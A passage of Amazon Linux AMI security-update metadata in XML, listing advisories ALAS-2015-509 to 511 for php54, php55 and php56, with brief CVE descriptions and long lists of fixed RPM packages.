arch="i686"><filename>Packages/php56-opcache-5.6.7-1.110.amzn1.i686.rpm</filename></package><package name="php56-recode" version="5.6.7" release="1.110.amzn1" epoch="0" arch="i686"><filename>Packages/php56-recode-5.6.7-1.110.amzn1.i686.rpm</filename></package><package name="php56-process" version="5.6.7" release="1.110.amzn1" epoch="0" arch="i686"><filename>Packages/php56-process-5.6.7-1.110.amzn1.i686.rpm</filename></package><package name="php56-debuginfo" version="5.6.7" release="1.110.amzn1" epoch="0" arch="i686"><filename>Packages/php56-debuginfo-5.6.7-1.110.amzn1.i686.rpm</filename></package><package name="php56-cli" version="5.6.7" release="1.110.amzn1" epoch="0" arch="i686"><filename>Packages/php56-cli-5.6.7-1.110.amzn1.i686.rpm</filename></package><package name="php56-tidy" version="5.6.7" release="1.110.amzn1" epoch="0" arch="i686"><filename>Packages/php56-tidy-5.6.7-1.110.amzn1.i686.rpm</filename></package><package name="php56-mbstring" version="5.6.7" release="1.110.amzn1" epoch="0" arch="i686"><filename>Packages/php56-mbstring-5.6.7-1.110.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2015-509</id><title>Amazon Linux AMI 2014.03 - ALAS-2015-509: important priority package update for php54</title><issued date="2015-04-17 12:04:00" /><updated date="2015-06-15 14:29:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2015-3329:
A buffer overflow flaw was found in the way PHP's Phar extension parsed Phar archives. A specially crafted archive could cause PHP to crash or, possibly, execute arbitrary code when opened.
1213449:
CVE-2015-3329 php: buffer overflow in phar_set_inode()
CVE-2015-2783:
CVE-2015-2301:
A use-after-free flaw was found in PHP's phar (PHP Archive) paths implementation. A malicious script author could possibly use this flaw to disclose certain portions of server memory.
1194747:
CVE-2015-2301 php: use after free in phar_object.c
CVE-2015-1352:
A NULL pointer dereference flaw was found in PHP's pgsql extension. A specially crafted table name passed to function as pg_insert() or pg_select() could cause a PHP application to crash.
1185904:
CVE-2015-1352 php: NULL pointer dereference in pgsql extension
CVE-2014-9709:
A buffer over-read flaw was found in the GD library. A specially crafted GIF file could cause an application using the gdImageCreateFromGif() function to crash.
1188639:
CVE-2014-9709 gd: buffer read overflow in gd_gif_in.c
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9709" title="" id="CVE-2014-9709" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1352" title="" id="CVE-2015-1352" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2301" title="" id="CVE-2015-2301" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2783" title="" id="CVE-2015-2783" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3329" title="" id="CVE-2015-3329" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="php54-mbstring" version="5.4.40" release="1.68.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-mbstring-5.4.40-1.68.amzn1.x86_64.rpm</filename></package><package name="php54-dba" version="5.4.40" release="1.68.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-dba-5.4.40-1.68.amzn1.x86_64.rpm</filename></package><package name="php54-soap" version="5.4.40" release="1.68.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-soap-5.4.40-1.68.amzn1.x86_64.rpm</filename></package><package name="php54-pgsql" version="5.4.40" release="1.68.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-pgsql-5.4.40-1.68.amzn1.x86_64.rpm</filename></package><package name="php54-xml" version="5.4.40" release="1.68.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-xml-5.4.40-1.68.amzn1.x86_64.rpm</filename></package><package name="php54-devel" version="5.4.40" release="1.68.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-devel-5.4.40-1.68.amzn1.x86_64.rpm</filename></package><package name="php54-tidy" version="5.4.40" release="1.68.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-tidy-5.4.40-1.68.amzn1.x86_64.rpm</filename></package><package name="php54-enchant" version="5.4.40" release="1.68.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-enchant-5.4.40-1.68.amzn1.x86_64.rpm</filename></package><package name="php54-common" version="5.4.40" release="1.68.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-common-5.4.40-1.68.amzn1.x86_64.rpm</filename></package><package name="php54-mysqlnd" version="5.4.40" release="1.68.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-mysqlnd-5.4.40-1.68.amzn1.x86_64.rpm</filename></package><package name="php54-gd" version="5.4.40" release="1.68.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-gd-5.4.40-1.68.amzn1.x86_64.rpm</filename></package><package name="php54-snmp" version="5.4.40" release="1.68.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-snmp-5.4.40-1.68.amzn1.x86_64.rpm</filename></package><package name="php54-odbc" version="5.4.40" release="1.68.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-odbc-5.4.40-1.68.amzn1.x86_64.rpm</filename></package><package name="php54-intl" version="5.4.40" release="1.68.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-intl-5.4.40-1.68.amzn1.x86_64.rpm</filename></package><package name="php54" version="5.4.40" release="1.68.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-5.4.40-1.68.amzn1.x86_64.rpm</filename></package><package name="php54-debuginfo" version="5.4.40" release="1.68.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-debuginfo-5.4.40-1.68.amzn1.x86_64.rpm</filename></package><package name="php54-pdo" version="5.4.40" release="1.68.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-pdo-5.4.40-1.68.amzn1.x86_64.rpm</filename></package><package name="php54-process" version="5.4.40" release="1.68.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-process-5.4.40-1.68.amzn1.x86_64.rpm</filename></package><package name="php54-bcmath" version="5.4.40" release="1.68.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-bcmath-5.4.40-1.68.amzn1.x86_64.rpm</filename></package><package name="php54-pspell" version="5.4.40" release="1.68.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-pspell-5.4.40-1.68.amzn1.x86_64.rpm</filename></package><package name="php54-xmlrpc" version="5.4.40" release="1.68.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-xmlrpc-5.4.40-1.68.amzn1.x86_64.rpm</filename></package><package name="php54-fpm" version="5.4.40" release="1.68.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-fpm-5.4.40-1.68.amzn1.x86_64.rpm</filename></package><package name="php54-embedded" version="5.4.40" release="1.68.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-embedded-5.4.40-1.68.amzn1.x86_64.rpm</filename></package><package name="php54-recode" version="5.4.40" release="1.68.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-recode-5.4.40-1.68.amzn1.x86_64.rpm</filename></package><package name="php54-mssql" version="5.4.40" release="1.68.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-mssql-5.4.40-1.68.amzn1.x86_64.rpm</filename></package><package name="php54-mcrypt" version="5.4.40" release="1.68.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-mcrypt-5.4.40-1.68.amzn1.x86_64.rpm</filename></package><package name="php54-ldap" version="5.4.40" release="1.68.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-ldap-5.4.40-1.68.amzn1.x86_64.rpm</filename></package><package name="php54-cli" version="5.4.40" release="1.68.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-cli-5.4.40-1.68.amzn1.x86_64.rpm</filename></package><package name="php54-mysql" version="5.4.40" release="1.68.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-mysql-5.4.40-1.68.amzn1.x86_64.rpm</filename></package><package name="php54-imap" version="5.4.40" release="1.68.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-imap-5.4.40-1.68.amzn1.x86_64.rpm</filename></package><package name="php54-mysqlnd" version="5.4.40" release="1.68.amzn1" epoch="0" arch="i686"><filename>Packages/php54-mysqlnd-5.4.40-1.68.amzn1.i686.rpm</filename></package><package name="php54-xmlrpc" version="5.4.40" release="1.68.amzn1" epoch="0" arch="i686"><filename>Packages/php54-xmlrpc-5.4.40-1.68.amzn1.i686.rpm</filename></package><package name="php54-devel" version="5.4.40" release="1.68.amzn1" epoch="0" arch="i686"><filename>Packages/php54-devel-5.4.40-1.68.amzn1.i686.rpm</filename></package><package name="php54-pgsql" version="5.4.40" release="1.68.amzn1" epoch="0" arch="i686"><filename>Packages/php54-pgsql-5.4.40-1.68.amzn1.i686.rpm</filename></package><package name="php54-enchant" version="5.4.40" release="1.68.amzn1" epoch="0" arch="i686"><filename>Packages/php54-enchant-5.4.40-1.68.amzn1.i686.rpm</filename></package><package name="php54-cli" version="5.4.40" release="1.68.amzn1" epoch="0" arch="i686"><filename>Packages/php54-cli-5.4.40-1.68.amzn1.i686.rpm</filename></package><package name="php54-soap" version="5.4.40" release="1.68.amzn1" epoch="0" arch="i686"><filename>Packages/php54-soap-5.4.40-1.68.amzn1.i686.rpm</filename></package><package name="php54-dba" version="5.4.40" release="1.68.amzn1" epoch="0" arch="i686"><filename>Packages/php54-dba-5.4.40-1.68.amzn1.i686.rpm</filename></package><package name="php54-mysql" version="5.4.40" release="1.68.amzn1" epoch="0" arch="i686"><filename>Packages/php54-mysql-5.4.40-1.68.amzn1.i686.rpm</filename></package><package name="php54-ldap" version="5.4.40" release="1.68.amzn1" epoch="0" arch="i686"><filename>Packages/php54-ldap-5.4.40-1.68.amzn1.i686.rpm</filename></package><package name="php54-pdo" version="5.4.40" release="1.68.amzn1" epoch="0" arch="i686"><filename>Packages/php54-pdo-5.4.40-1.68.amzn1.i686.rpm</filename></package><package name="php54-recode" version="5.4.40" release="1.68.amzn1" epoch="0" arch="i686"><filename>Packages/php54-recode-5.4.40-1.68.amzn1.i686.rpm</filename></package><package name="php54-tidy" version="5.4.40" release="1.68.amzn1" epoch="0" arch="i686"><filename>Packages/php54-tidy-5.4.40-1.68.amzn1.i686.rpm</filename></package><package name="php54-common" version="5.4.40" release="1.68.amzn1" epoch="0" arch="i686"><filename>Packages/php54-common-5.4.40-1.68.amzn1.i686.rpm</filename></package><package name="php54-process" version="5.4.40" release="1.68.amzn1" epoch="0" arch="i686"><filename>Packages/php54-process-5.4.40-1.68.amzn1.i686.rpm</filename></package><package name="php54-intl" version="5.4.40" release="1.68.amzn1" epoch="0" arch="i686"><filename>Packages/php54-intl-5.4.40-1.68.amzn1.i686.rpm</filename></package><package name="php54-fpm" version="5.4.40" release="1.68.amzn1" epoch="0" arch="i686"><filename>Packages/php54-fpm-5.4.40-1.68.amzn1.i686.rpm</filename></package><package name="php54-snmp" version="5.4.40" release="1.68.amzn1" epoch="0" arch="i686"><filename>Packages/php54-snmp-5.4.40-1.68.amzn1.i686.rpm</filename></package><package name="php54-debuginfo" version="5.4.40" release="1.68.amzn1" epoch="0" arch="i686"><filename>Packages/php54-debuginfo-5.4.40-1.68.amzn1.i686.rpm</filename></package><package name="php54" version="5.4.40" release="1.68.amzn1" epoch="0" arch="i686"><filename>Packages/php54-5.4.40-1.68.amzn1.i686.rpm</filename></package><package name="php54-odbc" version="5.4.40" release="1.68.amzn1" epoch="0" arch="i686"><filename>Packages/php54-odbc-5.4.40-1.68.amzn1.i686.rpm</filename></package><package name="php54-embedded" version="5.4.40" release="1.68.amzn1" epoch="0" arch="i686"><filename>Packages/php54-embedded-5.4.40-1.68.amzn1.i686.rpm</filename></package><package name="php54-xml" version="5.4.40" release="1.68.amzn1" epoch="0" arch="i686"><filename>Packages/php54-xml-5.4.40-1.68.amzn1.i686.rpm</filename></package><package name="php54-gd" version="5.4.40" release="1.68.amzn1" epoch="0" arch="i686"><filename>Packages/php54-gd-5.4.40-1.68.amzn1.i686.rpm</filename></package><package name="php54-mcrypt" version="5.4.40" release="1.68.amzn1" epoch="0" arch="i686"><filename>Packages/php54-mcrypt-5.4.40-1.68.amzn1.i686.rpm</filename></package><package name="php54-mssql" version="5.4.40" release="1.68.amzn1" epoch="0" arch="i686"><filename>Packages/php54-mssql-5.4.40-1.68.amzn1.i686.rpm</filename></package><package name="php54-mbstring" version="5.4.40" release="1.68.amzn1" epoch="0" arch="i686"><filename>Packages/php54-mbstring-5.4.40-1.68.amzn1.i686.rpm</filename></package><package name="php54-imap" version="5.4.40" release="1.68.amzn1" epoch="0" arch="i686"><filename>Packages/php54-imap-5.4.40-1.68.amzn1.i686.rpm</filename></package><package name="php54-pspell" version="5.4.40" release="1.68.amzn1" epoch="0" arch="i686"><filename>Packages/php54-pspell-5.4.40-1.68.amzn1.i686.rpm</filename></package><package name="php54-bcmath" version="5.4.40" release="1.68.amzn1" epoch="0" arch="i686"><filename>Packages/php54-bcmath-5.4.40-1.68.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2015-510</id><title>Amazon Linux AMI 2014.03 - ALAS-2015-510: low priority package update for php55</title><issued date="2015-04-17 12:04:00" /><updated date="2015-06-15 14:29:00" /><severity>low</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2015-3329:
A buffer overflow flaw was found in the way PHP's Phar extension parsed Phar archives. A specially crafted archive could cause PHP to crash or, possibly, execute arbitrary code when opened.
1213449:
CVE-2015-3329 php: buffer overflow in phar_set_inode()
CVE-2015-1352:
A NULL pointer dereference flaw was found in PHP's pgsql extension. A specially crafted table name passed to function as pg_insert() or pg_select() could cause a PHP application to crash.
1185904:
CVE-2015-1352 php: NULL pointer dereference in pgsql extension
CVE-2015-1351:
A use-after-free flaw was found in PHP's OPcache extension. This flaw could possibly lead to a disclosure of portion of server memory.
1185900:
CVE-2015-1351 php: use after free in opcache extension
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1351" title="" id="CVE-2015-1351" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1352" title="" id="CVE-2015-1352" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3329" title="" id="CVE-2015-3329" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="php55-dba" version="5.5.24" release="1.100.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-dba-5.5.24-1.100.amzn1.x86_64.rpm</filename></package><package name="php55-mysqlnd" version="5.5.24" release="1.100.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-mysqlnd-5.5.24-1.100.amzn1.x86_64.rpm</filename></package><package name="php55-process" version="5.5.24" release="1.100.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-process-5.5.24-1.100.amzn1.x86_64.rpm</filename></package><package name="php55-cli" version="5.5.24" release="1.100.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-cli-5.5.24-1.100.amzn1.x86_64.rpm</filename></package><package name="php55-imap" version="5.5.24" release="1.100.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-imap-5.5.24-1.100.amzn1.x86_64.rpm</filename></package><package name="php55-mcrypt" version="5.5.24" release="1.100.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-mcrypt-5.5.24-1.100.amzn1.x86_64.rpm</filename></package><package name="php55-embedded" version="5.5.24" release="1.100.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-embedded-5.5.24-1.100.amzn1.x86_64.rpm</filename></package><package name="php55-snmp" version="5.5.24" release="1.100.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-snmp-5.5.24-1.100.amzn1.x86_64.rpm</filename></package><package name="php55-intl" version="5.5.24" release="1.100.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-intl-5.5.24-1.100.amzn1.x86_64.rpm</filename></package><package name="php55-common" version="5.5.24" release="1.100.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-common-5.5.24-1.100.amzn1.x86_64.rpm</filename></package><package name="php55-gmp" version="5.5.24" release="1.100.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-gmp-5.5.24-1.100.amzn1.x86_64.rpm</filename></package><package name="php55-ldap" version="5.5.24" release="1.100.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-ldap-5.5.24-1.100.amzn1.x86_64.rpm</filename></package><package name="php55-pdo" version="5.5.24" release="1.100.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-pdo-5.5.24-1.100.amzn1.x86_64.rpm</filename></package><package name="php55-fpm" version="5.5.24" release="1.100.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-fpm-5.5.24-1.100.amzn1.x86_64.rpm</filename></package><package name="php55-bcmath" version="5.5.24" release="1.100.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-bcmath-5.5.24-1.100.amzn1.x86_64.rpm</filename></package><package name="php55-tidy" version="5.5.24" release="1.100.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-tidy-5.5.24-1.100.amzn1.x86_64.rpm</filename></package><package name="php55-opcache" version="5.5.24" release="1.100.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-opcache-5.5.24-1.100.amzn1.x86_64.rpm</filename></package><package name="php55-enchant" version="5.5.24" release="1.100.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-enchant-5.5.24-1.100.amzn1.x86_64.rpm</filename></package><package name="php55-mbstring" version="5.5.24" release="1.100.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-mbstring-5.5.24-1.100.amzn1.x86_64.rpm</filename></package><package name="php55-devel" version="5.5.24" release="1.100.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-devel-5.5.24-1.100.amzn1.x86_64.rpm</filename></package><package name="php55-gd" version="5.5.24" release="1.100.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-gd-5.5.24-1.100.amzn1.x86_64.rpm</filename></package><package name="php55-debuginfo" version="5.5.24" release="1.100.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-debuginfo-5.5.24-1.100.amzn1.x86_64.rpm</filename></package><package name="php55-soap" version="5.5.24" release="1.100.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-soap-5.5.24-1.100.amzn1.x86_64.rpm</filename></package><package name="php55-xmlrpc" version="5.5.24" release="1.100.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-xmlrpc-5.5.24-1.100.amzn1.x86_64.rpm</filename></package><package name="php55-pgsql" version="5.5.24" release="1.100.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-pgsql-5.5.24-1.100.amzn1.x86_64.rpm</filename></package><package name="php55-pspell" version="5.5.24" release="1.100.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-pspell-5.5.24-1.100.amzn1.x86_64.rpm</filename></package><package name="php55" version="5.5.24" release="1.100.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-5.5.24-1.100.amzn1.x86_64.rpm</filename></package><package name="php55-xml" version="5.5.24" release="1.100.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-xml-5.5.24-1.100.amzn1.x86_64.rpm</filename></package><package name="php55-mssql" version="5.5.24" release="1.100.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-mssql-5.5.24-1.100.amzn1.x86_64.rpm</filename></package><package name="php55-recode" version="5.5.24" release="1.100.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-recode-5.5.24-1.100.amzn1.x86_64.rpm</filename></package><package name="php55-odbc" version="5.5.24" release="1.100.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-odbc-5.5.24-1.100.amzn1.x86_64.rpm</filename></package><package name="php55-tidy" version="5.5.24" release="1.100.amzn1" epoch="0" arch="i686"><filename>Packages/php55-tidy-5.5.24-1.100.amzn1.i686.rpm</filename></package><package name="php55-process" version="5.5.24" release="1.100.amzn1" epoch="0" arch="i686"><filename>Packages/php55-process-5.5.24-1.100.amzn1.i686.rpm</filename></package><package name="php55-snmp" version="5.5.24" release="1.100.amzn1" epoch="0" arch="i686"><filename>Packages/php55-snmp-5.5.24-1.100.amzn1.i686.rpm</filename></package><package name="php55-enchant" version="5.5.24" release="1.100.amzn1" epoch="0" arch="i686"><filename>Packages/php55-enchant-5.5.24-1.100.amzn1.i686.rpm</filename></package><package name="php55-opcache" version="5.5.24" release="1.100.amzn1" epoch="0" arch="i686"><filename>Packages/php55-opcache-5.5.24-1.100.amzn1.i686.rpm</filename></package><package name="php55-mssql" version="5.5.24" release="1.100.amzn1" epoch="0" arch="i686"><filename>Packages/php55-mssql-5.5.24-1.100.amzn1.i686.rpm</filename></package><package name="php55-pgsql" version="5.5.24" release="1.100.amzn1" epoch="0" arch="i686"><filename>Packages/php55-pgsql-5.5.24-1.100.amzn1.i686.rpm</filename></package><package name="php55-gmp" version="5.5.24" release="1.100.amzn1" epoch="0" arch="i686"><filename>Packages/php55-gmp-5.5.24-1.100.amzn1.i686.rpm</filename></package><package name="php55-xml" version="5.5.24" release="1.100.amzn1" epoch="0" arch="i686"><filename>Packages/php55-xml-5.5.24-1.100.amzn1.i686.rpm</filename></package><package name="php55-ldap" version="5.5.24" release="1.100.amzn1" epoch="0" arch="i686"><filename>Packages/php55-ldap-5.5.24-1.100.amzn1.i686.rpm</filename></package><package name="php55-debuginfo" version="5.5.24" release="1.100.amzn1" epoch="0" arch="i686"><filename>Packages/php55-debuginfo-5.5.24-1.100.amzn1.i686.rpm</filename></package><package name="php55-mysqlnd" version="5.5.24" release="1.100.amzn1" epoch="0" arch="i686"><filename>Packages/php55-mysqlnd-5.5.24-1.100.amzn1.i686.rpm</filename></package><package name="php55-dba" version="5.5.24" release="1.100.amzn1" epoch="0" arch="i686"><filename>Packages/php55-dba-5.5.24-1.100.amzn1.i686.rpm</filename></package><package name="php55-odbc" version="5.5.24" release="1.100.amzn1" epoch="0" arch="i686"><filename>Packages/php55-odbc-5.5.24-1.100.amzn1.i686.rpm</filename></package><package name="php55-devel" version="5.5.24" release="1.100.amzn1" epoch="0" arch="i686"><filename>Packages/php55-devel-5.5.24-1.100.amzn1.i686.rpm</filename></package><package name="php55-common" version="5.5.24" release="1.100.amzn1" epoch="0" arch="i686"><filename>Packages/php55-common-5.5.24-1.100.amzn1.i686.rpm</filename></package><package name="php55-imap" version="5.5.24" release="1.100.amzn1" epoch="0" arch="i686"><filename>Packages/php55-imap-5.5.24-1.100.amzn1.i686.rpm</filename></package><package name="php55-recode" version="5.5.24" release="1.100.amzn1" epoch="0" arch="i686"><filename>Packages/php55-recode-5.5.24-1.100.amzn1.i686.rpm</filename></package><package name="php55-mbstring" version="5.5.24" release="1.100.amzn1" epoch="0" arch="i686"><filename>Packages/php55-mbstring-5.5.24-1.100.amzn1.i686.rpm</filename></package><package name="php55-pdo" version="5.5.24" release="1.100.amzn1" epoch="0" arch="i686"><filename>Packages/php55-pdo-5.5.24-1.100.amzn1.i686.rpm</filename></package><package name="php55-pspell" version="5.5.24" release="1.100.amzn1" epoch="0" arch="i686"><filename>Packages/php55-pspell-5.5.24-1.100.amzn1.i686.rpm</filename></package><package name="php55-gd" version="5.5.24" release="1.100.amzn1" epoch="0" arch="i686"><filename>Packages/php55-gd-5.5.24-1.100.amzn1.i686.rpm</filename></package><package name="php55-bcmath" version="5.5.24" release="1.100.amzn1" epoch="0" arch="i686"><filename>Packages/php55-bcmath-5.5.24-1.100.amzn1.i686.rpm</filename></package><package name="php55" version="5.5.24" release="1.100.amzn1" epoch="0" arch="i686"><filename>Packages/php55-5.5.24-1.100.amzn1.i686.rpm</filename></package><package name="php55-xmlrpc" version="5.5.24" release="1.100.amzn1" epoch="0" arch="i686"><filename>Packages/php55-xmlrpc-5.5.24-1.100.amzn1.i686.rpm</filename></package><package name="php55-intl" version="5.5.24" release="1.100.amzn1" epoch="0" arch="i686"><filename>Packages/php55-intl-5.5.24-1.100.amzn1.i686.rpm</filename></package><package name="php55-embedded" version="5.5.24" release="1.100.amzn1" epoch="0" arch="i686"><filename>Packages/php55-embedded-5.5.24-1.100.amzn1.i686.rpm</filename></package><package name="php55-mcrypt" version="5.5.24" release="1.100.amzn1" epoch="0" arch="i686"><filename>Packages/php55-mcrypt-5.5.24-1.100.amzn1.i686.rpm</filename></package><package name="php55-soap" version="5.5.24" release="1.100.amzn1" epoch="0" arch="i686"><filename>Packages/php55-soap-5.5.24-1.100.amzn1.i686.rpm</filename></package><package name="php55-cli" version="5.5.24" release="1.100.amzn1" epoch="0" arch="i686"><filename>Packages/php55-cli-5.5.24-1.100.amzn1.i686.rpm</filename></package><package name="php55-fpm" version="5.5.24" release="1.100.amzn1" epoch="0" arch="i686"><filename>Packages/php55-fpm-5.5.24-1.100.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2015-511</id><title>Amazon Linux AMI 2014.03 - ALAS-2015-511: low priority package update for php56</title><issued date="2015-04-17 12:04:00" /><updated date="2015-06-15 14:29:00" /><severity>low</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2015-3329:
A buffer overflow flaw was found in the way PHP's Phar extension parsed Phar archives. A specially crafted archive could cause PHP to crash or, possibly, execute arbitrary code when opened.
1213449:
CVE-2015-3329 php: buffer overflow in phar_set_inode()
CVE-2015-1352:
A NULL pointer dereference flaw was found in PHP's pgsql extension. A specially crafted table name passed to function as pg_insert() or pg_select() could cause a PHP application to crash.
1185904:
CVE-2015-1352 php: NULL pointer dereference in pgsql extension
CVE-2015-1351:
A use-after-free flaw was found in PHP's OPcache extension. This flaw could possibly lead to a disclosure of portion of server memory.
1185900:
CVE-2015-1351 php: use after free in opcache extension
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1351" title="" id="CVE-2015-1351" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1352" title="" id="CVE-2015-1352" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3329" title="" id="CVE-2015-3329" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="php56-mbstring" version="5.6.8" release="1.111.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-mbstring-5.6.8-1.111.amzn1.x86_64.rpm</filename></package><package name="php56-debuginfo" version="5.6.8" release="1.111.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-debuginfo-5.6.8-1.111.amzn1.x86_64.rpm</filename></package><package name="php56-ldap" version="5.6.8" release="1.111.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-ldap-5.6.8-1.111.amzn1.x86_64.rpm</filename></package><package name="php56-bcmath" version="5.6.8" release="1.111.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-bcmath-5.6.8-1.111.amzn1.x86_64.rpm</filename></package><package name="php56-pdo" version="5.6.8" release="1.111.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-pdo-5.6.8-1.111.amzn1.x86_64.rpm</filename></package><package name="php56-snmp" version="5.6.8" release="1.111.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-snmp-5.6.8-1.111.amzn1.x86_64.rpm</filename></package><package name="php56-mssql" version="5.6.8" release="1.111.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-mssql-5.6.8-1.111.amzn1.x86_64.rpm</filename></package><package name="php56-tidy" version="5.6.8" release="1.111.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-tidy-5.6.8-1.111.amzn1.x86_64.rpm</filename></package><package name="php56-pgsql" version="5.6.8" release="1.111.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-pgsql-5.6.8-1.111.amzn1.x86_64.rpm</filename></package><package name="php56-mysqlnd" version="5.6.8" release="1.111.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-mysqlnd-5.6.8-1.111.amzn1.x86_64.rpm</filename></package><package name="php56-cli" version="5.6.8" release="1.111.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-cli-5.6.8-1.111.amzn1.x86_64.rpm</filename></package><package name="php56-mcrypt" version="5.6.8" release="1.111.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-mcrypt-5.6.8-1.111.amzn1.x86_64.rpm</filename></package><package name="php56-dbg" version="5.6.8" release="1.111.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-dbg-5.6.8-1.111.amzn1.x86_64.rpm</filename></package><package name="php56-xml" version="5.6.8" release="1.111.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-xml-5.6.8-1.111.amzn1.x86_64.rpm</filename></package><package name="php56-process" version="5.6.8" release="1.111.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-process-5.6.8-1.111.amzn1.x86_64.rpm</filename></package><package name="php56-intl" version="5.6.8" release="1.111.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-intl-5.6.8-1.111.amzn1.x86_64.rpm</filename></package><package name="php56-odbc" version="5.6.8" release="1.111.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-odbc-5.6.8-1.111.amzn1.x86_64.rpm</filename></package><package name="php56-enchant" version="5.6.8" release="1.111.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-enchant-5.6.8-1.111.amzn1.x86_64.rpm</filename></package><package name="php56-gmp" version="5.6.8" release="1.111.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-gmp-5.6.8-1.111.amzn1.x86_64.rpm</filename></package><package name="php56-xmlrpc" 